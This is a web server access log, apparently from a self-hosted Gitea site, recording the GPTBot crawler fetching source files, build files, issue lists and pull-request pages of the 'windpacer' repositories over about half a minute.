"/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec?display=source" [Client 74.7.227.38] [Length 12502] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17557] [Gzip 2.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log?display=source" [Client 74.7.227.38] [Length 11682] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:17:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:17:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:17:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:17:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12959] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11033] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12959] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11177] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12959] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11178] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11029] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12957] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11451] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11838] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11446] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11447] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 